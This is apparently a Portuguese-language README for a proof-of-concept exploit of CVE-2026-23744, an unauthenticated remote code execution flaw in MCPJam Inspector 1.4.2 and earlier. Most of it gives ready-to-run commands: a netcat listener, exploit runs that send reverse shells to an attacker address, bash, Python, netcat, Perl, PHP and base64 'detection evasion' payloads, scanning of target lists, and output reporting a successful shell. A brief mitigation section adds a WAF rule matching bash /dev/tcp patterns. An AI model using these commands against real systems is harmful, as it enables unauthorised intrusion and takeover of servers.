
Uma prova de conceito de exploit para a vulnerabilidade CVE-2026-23744 - MCPJam Inspector Remote Code Execution (RCE). Esta ferramenta demonstra a falha de segurança nas versões <=1.4.2 e ajuda pesquisadores de segurança a verificar correções. Apenas para testes autorizados e fins educacionais. Inclui múltiplas opções de payload, execução de comandos e gerenciamento de sessão.
Esta ferramenta é apenas para testes de segurança autorizados e fins educacionais. O uso não autorizado é ilegal. Os usuários assumem toda a responsabilidade por suas ações.
Este repositório contém uma prova de conceito de exploração para CVE-2026-23744, uma vulnerabilidade de Execução Remota de Código (RCE) não autenticada encontrada no MCPJam Inspector versões <=1.4.2. A vulnerabilidade possui uma pontuação CVSS crítica de 9,8, indicando um risco severo com vetor de ataque de rede.
A ferramenta de exploração oferece um conjunto abrangente de recursos projetados para testes de segurança eficazes:
Para configurar a ferramenta de exploração, siga estas etapas:
Clone o repositório:
git clone https://github.com/CerberusMrXi/CVE-2026-23744-MCPJam-RCE-Exploit.git
cd CVE-2026-23744-MCPJam-RCE-Exploit
Instale as dependências:
pip install -r requirements.txt
Para iniciar uma exploração básica, primeiro configure um listener e depois execute o script de exploração:
# Start listener
nc -lvnp 4444
# Run exploit
python exploit.py -u http://target-ip:8080 -l attacker-ip -p 4444
Execute comandos individuais ou comandos de um arquivo:
# Execute single command
python exploit.py -u http://target:8080 -l 10.0.0.5 -p 4444 -c "id; whoami"
# Execute commands from file
python exploit.py -u http://target:8080 -l 10.0.0.5 -p 4444 -C commands.txt
Utilize vários tipos de payload para diferentes cenários:
# Python reverse shell
python exploit.py -u http://target:8080 -l 10.0.0.5 -p 4444 -t python
# Netcat reverse shell
python exploit.py -u http://target:8080 -l 10.0.0.5 -p 4444 -t nc
# Base64 encoded payload
python exploit.py -u http://target:8080 -l 10.0.0.5 -p 4444 -t base64
Varra múltiplos alvos em busca de vulnerabilidades:
# Create targets file
echo "http://192.168.1.10:8080" > targets.txt
echo "http://192.168.1.11:8080" >> targets.txt
# Scan for vulnerable targets
python exploit.py -f targets.txt -l 10.0.0.5 -p 4444 --scan
Explore funcionalidades avançadas como identificação, uso de proxy, modo detalhado e configuração automática de listener:
# With fingerprinting
python exploit.py -u http://target:8080 -l 10.0.0.5 -p 4444 --fingerprint
# With proxy
python exploit.py -u http://target:8080 -l 10.0.0.5 -p 4444 --proxy http://127.0.0.1:8080
# Verbose mode
python exploit.py -u http://target:8080 -l 10.0.0.5 -p 4444 -v
# Auto-listener
python exploit.py -u http://target:8080 -l 10.0.0.5 -p 4444 --listen
[+] Starting enhanced exploit against http://192.168.1.100:8080
[+] Reverse shell to 10.0.0.5:4444
[*] Session ID: AbCdEfGh
[*] Fingerprinting target...
[+] Target OS: Ubuntu
[+] Available capabilities: python3, perl, nc
[*] Executing exploit...
[+] Exploit successful!
[!] Check your netcat listener on 10.0.0.5:4444
Para se proteger contra o CVE-2026-23744, é crucial tomar as seguintes ações imediatas:
POST suspeitas para /api/mcp/connect.Exemplo de regra Nginx WAF para bloquear padrões maliciosos comuns:
location /api/mcp/connect {
if ($request_body ~* "bash.*/dev/tcp") { return 403; }
if ($request_body ~* "base64.*-d") { return 403; }
proxy_pass http://backend;
}
P: É legal usar isso?
R: Esta ferramenta só é legal para usar em sistemas que você possui ou para os quais tem permissão explícita por escrito para testar.
P: Quais sistemas são vulneráveis?
R: As versões do MCPJam Inspector <=1.4.2 são vulneráveis.
P: Como posso proteger meus sistemas?
R: Atualize para a versão >1.4.2 do MCPJam Inspector imediatamente.
Sudeepa Wanigarathna
O uso não autorizado desta ferramenta é ilegal e pode resultar em consequências graves, incluindo:
Feito com ❤️ por Sudeepa Wanigarathna
| Atributo | Detalhes |
|---|
| CVE ID | CVE-2026-23744 |
| Vulnerabilidade | Execução Remota de Código Não Autenticada |
| Versões Afetadas | <=1.4.2 |
| Pontuação CVSS | 9.8 (Crítico) |
| Vetor de Ataque | Rede |
| Tipo | Comando | Melhor Para |
|---|
bash | Shell reverso Bash | Maioria dos sistemas Linux |
python | Shell reverso Python3 | Sistemas com Python instalado |
nc | Shell reverso Netcat | Sistemas com netcat |
perl | Shell reverso Perl | Sistemas com Perl instalado |
php | Shell reverso PHP | Sistemas com PHP instalado |
base64 | Codificado em Base64 | Evasão de detecção |